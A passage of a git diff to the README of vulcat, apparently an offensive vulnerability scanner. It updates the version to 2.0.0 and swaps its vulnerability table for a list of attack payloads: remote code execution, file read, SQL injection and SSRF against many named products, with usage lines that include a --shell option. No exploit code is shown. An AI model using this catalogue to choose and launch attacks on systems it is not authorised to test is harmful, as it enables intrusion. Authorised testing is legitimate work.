minihttpd-cve-2018-18778-fileread | - | mini_httpd FileRead | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| mongoexpress-cve-2019-10758-rce | Y | Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| nexus-cve-2019-5475-rce | Y | 2.x yum Remote code execution | +| nexus-cve-2019-7238-rce | Y | 3.x Remote code execution | +| nexus-cve-2019-15588-rce | Y | 2019-5475 Bypass | +| nexus-cve-2020-10199-rce | Y | 3.x Remote code execution | +| nexus-cve-2020-10204-rce | Y | 3.x Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| nodejs-cve-2017-14849-fileread | Y | Node.js Directory traversal | +| nodejs-cve-2021-21315-rce | Y | Node.js Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| nodered-cve-2021-3223-fileread | Y | Node-RED Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| phpmyadmin-cve-2018-12613-fileinclude-fileread | - | phpMyadmin Scripts/setup.php Deserialization | +| phpmyadmin-wooyun-2016-199433-unserialize | Y | phpMyadmin 4.8.1 Remote File Inclusion | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| phpunit-cve-2017-9841-rce | Y | PHPUnit Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| ruby-on-rails-cve-2018-3760-fileread | Y | Ruby on Rails Directory traversal | +| ruby-on-rails-cve-2019-5418-fileread | Y | Ruby on Rails FileRead | +| ruby-on-rails-cve-2020-8163-rce | - | Ruby on Rails Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| showdoc-cnvd-2020-26585-fileupload | - | ShowDoc writes to any file | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| spring-security-oauth-cve-2016-4977-rce | - | Spring Security OAuth2 Remote Command Execution | +| spring-data-rest-cve-2017-8046-rce | - | Spring Data Rest Remote Command Execution | +| spring-data-commons-cve-2018-1273-rce | Y | Spring Data Commons Remote Command Execution | +| spring-cloud-config-cve-2020-5410-fileread | Y | Spring Cloud Directory traversal | +| spring-boot-cve-2021-21234-fileread | Y | Spring Boot Directory traversal | +| spring-cloud-gateway-cve-2022-22947-rce | - | Spring Cloud Gateway SpEl Remote code execution | +| spring-cloud-function-cve-2022-22963-rce | Y | Spring Cloud Function SpEL Remote code execution | +| spring-cve-2022-22965-rce | - | Spring Framework Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| supervisor-cve-2017-11610-rce | - | Supervisor Remote Command Execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| thinkphp-cve-2018-1002015-rce | Y | ThinkPHP5.x Remote code execution | +| thinkphp-cnvd-2018-24942-rce | Y | The forced route is not enabled RCE | +| thinkphp-cnnvd-201901-445-rce | Y | Core class Request Remote code execution | +| thinkphp-cnvd-2022-86535-rce | - | ThinkPHP "think-lang" Remote code execution | +| thinkphp-2.x-rce | - | ThinkPHP2.x Remote code execution | +| thinkphp-5-ids-sqlinject | - | ThinkPHP5 ids SQLinject | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| ueditor-ssrf | - | Ueditor SSRF | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| uwsgiphp-cve-2018-7490-fileread | Y | uWSGI-PHP Directory traversal | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| vmware-vcenter-2020-10-fileread | Y | In 2020 VMware vCenter 6.5 Any file read | +| vmware-vcenter-cve-2021-21972-fileupload-rce | - | VMware vSphere Client RCE | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| oracle-weblogic-cve-2014-4210-ssrf | - | Weblogic SSRF | +| oracle-weblogic-cve-2017-10271-unserialize | - | Weblogic XMLDecoder deSerialization | +| oracle-weblogic-cve-2019-2725-unserialize | - | Weblogic wls9_async deSerialization | +| oracle-weblogic-cve-2020-14750-bypass | - | Weblogic Authentication bypass | +| oracle-weblogic-cve-2020-14882-rce-unauth | Y | Weblogic Unauthorized command execution | +| oracle-weblogic-cve-2021-2109-rce | - | Weblogic LDAP Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| webmin-cve-2019-15107-rce | Y | Webmin Pre-Auth Remote code execution | +| webmin-cve-2019-15642-rce | Y | Webmin Remote code execution | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| yonyou-grp-u8-cnnvd-201610-923-sqlinject | - | Yonyou-GRP-U8 Proxy SQLinject | +| yonyou-nc-cnvd-2021-30167-rce | Y | Yonyou-NC BeanShell Remote code execution | +| yonyou-erp-nc-ncfindweb-fileread | - | Yonyou-ERP-NC NCFindWeb Directory traversal | +| yonyou-u8-oa-getsession-dsinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info | +| yonyou-u8-oa-test.jsp-sqlinject | - | Yonyou-U8-OA test.jsp SQLinject | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +| zabbix-cve-2016-10134-sqlinject | - | latest.php or jsrpc.php SQLinject | ++----------------------------------------------------------+-----+--------------------------------------------------------------+ +vulcat-2.0.0/2023.03.15 +112/Poc +55/Shell ```
@@ -371,6 +364,7 @@ vulcat-1.2.0/2023.03.01 * [vulhub](https://github.com/vulhub/vulhub) * [vulfocus](https://github.com/fofapro/vulfocus) * [ttkbootstrap](https://github.com/israel-dryer/ttkbootstrap/) +* [Xray](github.com/chaitin/xray) ## Document diff --git a/README.md b/README.md index 794d47a..a159b43 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ # vulcat [![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/) -[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/) +[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/) [![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/) [![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/) [![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/) @@ -49,182 +49,188 @@ Usage: python3 vulcat.py Examples: python3 vulcat.py -h python3 vulcat.py --list -python3 vulcat.py -u https://www.example.com/ -o html -python3 vulcat.py -u https://www.example.com/ -a httpd --log 3 -python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942 -python3 vulcat.py -f url.txt --delay 0.5 +python3 vulcat.py -u https://www.example.com/ +python3 vulcat.py -f url.txt -o html +python3 vulcat.py -u https://www.example.com/ -v httpd --log 3 +python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell ``` -## 漏洞列表 +## 攻击载荷列表
-目前支持检测的漏洞: [点击展开] +以下是vulcat拥有的攻击载荷: [点击展开] ``` -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Target | Vuln id | Vuln Type | Sh | Description | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Alibaba Druid | (None) | unAuth | - | 阿里巴巴Druid未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Alibaba Nacos | CVE-2021-29441 | unAuth | - | 阿里巴巴Nacos未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Airflow | CVE-2020-17526 | unAuth | - | Airflow身份验证绕过 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX默认密钥 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Druid | CVE-2021-25646 | RCE | Y | Apache Druid 远程代码执行 | -| Apache Druid | CVE-2021-36749 | FileRead | Y | Apache Druid 任意文件读取 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Flink | CVE-2020-17519 | FileRead | Y | Flink目录遍历 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Hadoop | (None) | unAuth | - | Hadoop YARN ResourceManager 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | -| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 路径遍历 | -| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 路径遍历 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQL注入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Solr | CVE-2017-12629 | RCE | - | Solr 远程命令执行 | -| Apache Solr | CVE-2019-17558 | RCE | Y | Solr Velocity 注入远程命令执行 | -| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/任意文件读取 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Tomcat | CVE-2017-12615 | FileUpload | - | PUT方法任意文件写入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Apache Unomi | CVE-2020-13942 | RCE | Y | Apache Unomi远程表达式代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb身份认证绕过 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence任意文件包含 | -| Atlassian Confluence | CVE-2019-3396 | FileRead | Y | Confluence路径遍历和命令执行 | -| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 | -| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Cisco | CVE-2020-3580 | XSS | - | 思科ASA/FTD XSS跨站脚本攻击 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Discuz | wooyun-2010-080723 | RCE | Y | 全局变量防御绕过RCE | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Django | CVE-2017-12794 | XSS | - | debug page XSS跨站脚本攻击 | -| Django | CVE-2018-14574 | Redirect | - | CommonMiddleware url重定向 | -| Django | CVE-2019-14234 | SQLinject | - | JSONfield SQL注入 | -| Django | CVE-2020-9402 | SQLinject | - | GIS SQL注入 | -| Django | CVE-2021-35042 | SQLinject | - | QuerySet.order_by SQL注入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 | -| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML 反序列化代码执行 | -| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 远程代码执行 | -| Drupal | CVE-2018-7602 | RCE | - | Drupal 远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch命令执行 | -| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 | -| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch 目录穿越 | -| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch 目录穿越 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP远程代码执行 | -| F5 BIG-IP | CVE-2022-1388 | unAuth/RCE | Y | BIG-IP远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Fastjson | CNVD-2017-02833 | unSerialize | Y | Fastjson <= 1.2.24 反序列化 | -| Fastjson | CNVD-2019-22238 | unSerialize | Y | Fastjson <= 1.2.47 反序列化 | -| Fastjson | rce-1-2-62 | unSerialize | Y | Fastjson <= 1.2.62 反序列化 | -| Fastjson | rce-1-2-66 | unSerialize | Y | Fastjson <= 1.2.66 反序列化 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Gitea | (None) | unAuth | - | Gitea 1.4.0 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth 远程命令执行 | -| Gitlab | CVE-2021-22214 | SSRF | Y | Gitlab CI Lint API未授权 SSRF | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| GoCD | CVE-2021-43287 | FileRead | Y | GoCD Business Continuity 任意文件读取 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x 插件模块路径遍历 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Influxdb | (None) | unAuth | - | influxdb 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| JBoss | (None) | unAuth | - | JBoss 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Jenkins | CVE-2018-1000861 | RCE | Y | jenkins 远程命令执行 | -| Jenkins | (None) | unAuth | Y | Jenkins 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Jetty | CVE-2021-28164 | DSinfo | - | jetty 模糊路径信息泄露 | -| Jetty | CVE-2021-28169 | DSinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | -| Jetty | CVE-2021-34429 | DSinfo | - | jetty 模糊路径信息泄露 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Joomla | CVE-2017-8917 | SQLinject | - | Joomla3.7 Core com_fields组件SQL注入 | -| Joomla | CVE-2023-23752 | unAuth | - | Joomla 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Jupyter | (None) | unAuth | - | Jupyter 未授权访问 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Keycloak | CVE-2020-10770 | SSRF | - | 使用request_uri调用未经验证的URL | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | 蓝凌OA 任意文件读取/SSRF | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd 任意文件读取 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| mongo-express | CVE-2019-10758 | RCE | Y | 未授权远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum插件 远程命令执行 | -| Nexus Repository | CVE-2019-7238 | RCE | Y | 3.x 远程命令执行 | -| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475的绕过 | -| Nexus Repository | CVE-2020-10199 | RCE | Y | 3.x 远程命令执行 | -| Nexus Repository | CVE-2020-10204 | RCE | Y | 3.x 远程命令执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js目录穿越 | -| Nodejs | CVE-2021-21315 | RCE | Y | Node.js命令执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED 任意文件读取 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php 反序列化 | -| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 远程文件包含 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit 远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails 路径遍历 | -| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails 任意文件读取 | -| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails 命令执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc 任意文件上传 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 远程命令执行 | -| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest 远程命令执行 | -| Spring | CVE-2018-1273 | RCE | Y | Spring Data Commons 远程命令执行 | -| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud目录遍历 | -| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot目录遍历 | -| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl远程代码执行 | -| Spring | CVE-2022-22963 | RCE | Y | Spring Cloud Function SpEL远程代码执行 | -| Spring | CVE-2022-22965 | RCE | - | Spring Framework远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Supervisor | CVE-2017-11610 | RCE | - | Supervisor 远程命令执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x 远程代码执行 | -| ThinkPHP | CNVD-2018-24942 | RCE | Y | 未开启强制路由导致RCE | -| ThinkPHP | CNNVD-201901-445 | RCE | Y | 核心类Request远程代码执行 | -| ThinkPHP | CNVD-2022-86535 | RCE | - | ThinkPHP 多语言模块命令执行 | -| ThinkPHP | rce-2-x | RCE | - | ThinkPHP2.x 远程代码执行 | -| ThinkPHP | ids-sqlinject-5 | SQLinject | - | ThinkPHP5 ids参数SQL注入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Ueditor | (None) | SSRF | - | Ueditor编辑器SSRF | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| uWSGI-PHP | CVE-2018-7490 | FileRead | Y | uWSGI-PHP目录穿越 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic 服务端请求伪造 | -| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder反序列化 | -| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async反序列化 | -| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic 权限验证绕过 | -| Oracle Weblogic | CVE-2020-14882 | RCE | Y | Weblogic 未授权命令执行 | -| Oracle Weblogic | CVE-2021-2109 | RCE | - | Weblogic LDAP 远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth 远程代码执行 | -| Webmin | CVE-2019-15642 | RCE | Y | Webmin 远程代码执行 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Yonyou | CNNVD-201610-923 | SQLinject | - | 用友GRP-U8 Proxy SQL注入 | -| Yonyou | CNVD-2021-30167 | RCE | Y | 用友NC BeanShell远程命令执行 | -| Yonyou | nc-fileread | FileRead | - | 用友ERP-NC NCFindWeb目录遍历 | -| Yonyou | u8-oa-getsession | DSinfo | - | 用友U8 OA getSessionList.jsp 敏感信息泄漏 | -| Yonyou | u8-oa-test-sql | SQLinject | - | 用友U8 OA test.jsp SQL注入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -| Zabbix | CVE-2016-10134 | SQLinject | - | latest.php或jsrpc.php存在sql注入 | -+----------------------+--------------------+--------------+-----+----------------------------------------------------------------------+ -vulcat-1.2.0/2023.03.01 -108/Poc -54/Shell ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| Payloads | Sh | Description | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| 74cms-v5.0.1-sqlinject | - | 74cms v5.0.1 前台AjaxPersonalController.class.php存在SQL注入 | +| 74cms-v6.0.4-xss | - | 74cms v6.0.4 帮助中心搜索框XSS | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| alibaba-druid-unauth | - | 阿里巴巴Druid未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| alibaba-nacos-cve-2021-29441-unauth | - | 阿里巴巴Nacos未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-airflow-cve-2020-17526-unauth | - | Airflow身份验证绕过 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-apisix-cve-2020-13945-unauth | - | Apache APISIX默认密钥 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-druid-cve-2021-25646-rce | Y | Apache Druid 远程代码执行 | +| apache-druid-cve-2021-36749-fileread | Y | Apache Druid 任意文件读取 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-flink-cve-2020-17519-fileread | Y | Flink目录遍历 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-hadoop-unauth | - | Hadoop YARN ResourceManager 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-httpd-cve-2021-40438-ssrf | - | Apache HTTP Server 2.4.48 mod_proxy SSRF | +| apache-httpd-cve-2021-41773-rce-fileread | Y | Apache HTTP Server 2.4.49 路径遍历 | +| apache-httpd-cve-2021-42013-rce-fileread | Y | Apache HTTP Server 2.4.50 路径遍历 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-skywalking-cve-2020-9483-sqlinject | - | SkyWalking SQL注入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-solr-cve-2017-12629-rce | - | Solr 远程命令执行 | +| apache-solr-cve-2019-17558-rce | Y | Solr Velocity 注入远程命令执行 | +| apache-solr-cve-2021-27905-ssrf-fileread | Y | Solr SSRF/任意文件读取 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-tomcat-cve-2017-12615-fileupload | - | PUT方法任意文件写入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| apache-unomi-cve-2020-13942-rce | Y | Apache Unomi远程表达式代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| appweb-cve-2018-8715-unauth | - | AppWeb身份认证绕过 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| atlassian-confluence-cve-2015-8399-fileread-fileinclude | Y | Confluence任意文件包含 | +| atlassian-confluence-cve-2019-3396-fileread | Y | Confluence路径遍历和命令执行 | +| atlassian-confluence-cve-2021-26084-rce | Y | Confluence Webwork Pre-Auth OGNL表达式命令注入 | +| atlassian-confluence-cve-2022-26134-rce | Y | Confluence远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| cisco-cve-2020-3580-xss | - | 思科ASA/FTD XSS跨站脚本攻击 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| discuz-wooyun-2010-080723-rce | Y | 全局变量防御绕过RCE | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| django-cve-2017-12794-xss | - | debug page XSS跨站脚本攻击 | +| django-cve-2018-14574-redirect | - | CommonMiddleware url重定向 | +| django-cve-2019-14234-sqlinject | - | JSONfield SQL注入 | +| django-cve-2020-9402-sqlinject | - | GIS SQL注入 | +| django-cve-2021-35042-sqlinject | - | QuerySet.order_by SQL注入 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| drupal-cve-2014-3704-sqlinject | - | Drupal < 7.32 Drupalgeddon SQL 注入 | +| drupal-cve-2017-6920-rce | - | Drupal Core 8 PECL YAML 反序列化代码执行 | +| drupal-cve-2018-7600-rce | Y | Drupal Drupalgeddon 2 远程代码执行 | +| drupal-cve-2018-7602-rce | - | Drupal 远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| elasticsearch-cve-2014-3120-rce | Y | ElasticSearch命令执行 | +| elasticsearch-cve-2015-1427-rce | Y | ElasticSearch Groovy 沙盒绕过&&代码执行 | +| elasticsearch-cve-2015-3337-fileread | Y | ElasticSearch 目录穿越 | +| elasticsearch-cve-2015-5531-fileread | Y | ElasticSearch 目录穿越 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| f5bigip-cve-2020-5902-rce-fileread | - | BIG-IP远程代码执行 | +| f5bigip-cve-2022-1388-unauth-rce | Y | BIG-IP身份认证绕过RCE | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| fastjson-cnvd-2017-02833-rce | Y | Fastjson <= 1.2.24 反序列化 | +| fastjson-cnvd-2019-22238-rce | Y | Fastjson <= 1.2.47 反序列化 | +| fastjson-v1.2.62-rce | Y | Fastjson <= 1.2.62 反序列化 | +| fastjson-v1.2.66-rce | Y | Fastjson <= 1.2.66 反序列化 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| gitea-unauth-fileread-rce | - | Gitea 1.4.0 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| gitlab-cve-2021-22205-rce.py | - | GitLab Pre-Auth 远程命令执行 | +| gitlab-cve-2021-22214-ssrf | Y | Gitlab CI Lint API未授权 SSRF | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| gocd-cve-2021-43287-fileread | Y | GoCD Business Continuity 任意文件读取 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| grafana-cve-2021-43798-fileread | Y | Grafana 8.x 插件模块路径遍历 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| influxdb-unauth | - | influxdb 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| jboss-unauth | - | JBoss 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| jenkins-cve-2018-1000861-rce | Y | jenkins 远程命令执行 | +| jenkins-unauth | Y | Jenkins 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| jetty-cve-2021-28164-dsinfo | - | jetty 模糊路径信息泄露 | +| jetty-cve-2021-28169-dsinfo | - | jetty Utility Servlets ConcatServlet 双重解码信息泄露 | +| jetty-cve-2021-34429-dsinfo | - | jetty 模糊路径信息泄露 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| joomla-cve-2017-8917-sqlinject | - | Joomla3.7 Core com_fields组件SQL注入 | +| joomla-cve-2023-23752-unauth | - | Joomla 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| jupyter-unauth | - | Jupyter 未授权访问 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| keycloak-cve-2020-10770-ssrf | - | 使用request_uri调用未经验证的URL | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| landray-oa-cnvd-2021-28277-ssrf-fileread | Y | 蓝凌OA 任意文件读取/SSRF | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| minihttpd-cve-2018-18778-fileread | - | mini_httpd 任意文件读取 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| mongoexpress-cve-2019-10758-rce | Y | 未授权远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| nexus-cve-2019-5475-rce | Y | 2.x yum插件 远程命令执行 | +| nexus-cve-2019-7238-rce | Y | 3.x 远程命令执行 | +| nexus-cve-2019-15588-rce | Y | 2019-5475的绕过 | +| nexus-cve-2020-10199-rce | Y | 3.x 远程命令执行 | +| nexus-cve-2020-10204-rce | Y | 3.x 远程命令执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| nodejs-cve-2017-14849-fileread | Y | Node.js目录穿越 | +| nodejs-cve-2021-21315-rce | Y | Node.js命令执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| nodered-cve-2021-3223-fileread | Y | Node-RED 任意文件读取 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| phpmyadmin-cve-2018-12613-fileinclude-fileread | - | phpMyadmin Scripts/setup.php 反序列化 | +| phpmyadmin-wooyun-2016-199433-unserialize | Y | phpMyadmin 4.8.1 远程文件包含 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| phpunit-cve-2017-9841-rce | Y | PHPUnit 远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| ruby-on-rails-cve-2018-3760-fileread | Y | Ruby on Rails 路径遍历 | +| ruby-on-rails-cve-2019-5418-fileread | Y | Ruby on Rails 任意文件读取 | +| ruby-on-rails-cve-2020-8163-rce | - | Ruby on Rails 命令执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| showdoc-cnvd-2020-26585-fileupload | - | ShowDoc 任意文件上传 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| spring-security-oauth-cve-2016-4977-rce | - | Spring Security OAuth2 远程命令执行 | +| spring-data-rest-cve-2017-8046-rce | - | Spring Data Rest 远程命令执行 | +| spring-data-commons-cve-2018-1273-rce | Y | Spring Data Commons 远程命令执行 | +| spring-cloud-config-cve-2020-5410-fileread | Y | Spring Cloud目录遍历 | +| spring-boot-cve-2021-21234-fileread | Y | Spring Boot目录遍历 | +| spring-cloud-gateway-cve-2022-22947-rce | - | Spring Cloud Gateway SpEl远程代码执行 | +| spring-cloud-function-cve-2022-22963-rce | Y | Spring Cloud Function SpEL远程代码执行 | +| spring-cve-2022-22965-rce | - | Spring Framework远程代码执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| supervisor-cve-2017-11610-rce | - | Supervisor 远程命令执行 | ++----------------------------------------------------------+-----+----------------------------------------------------------------------+ +| thinkphp-cve-2018-1002015-rce | Y | ThinkPHP5.x 远程代码执行 | +| thinkphp-cnvd-2018-24942-rce | Y | 未开启强制路由导致RCE | +| thinkphp-cnnvd-201901-445-rce | Y | 核心类Request远程代码执行 | +| 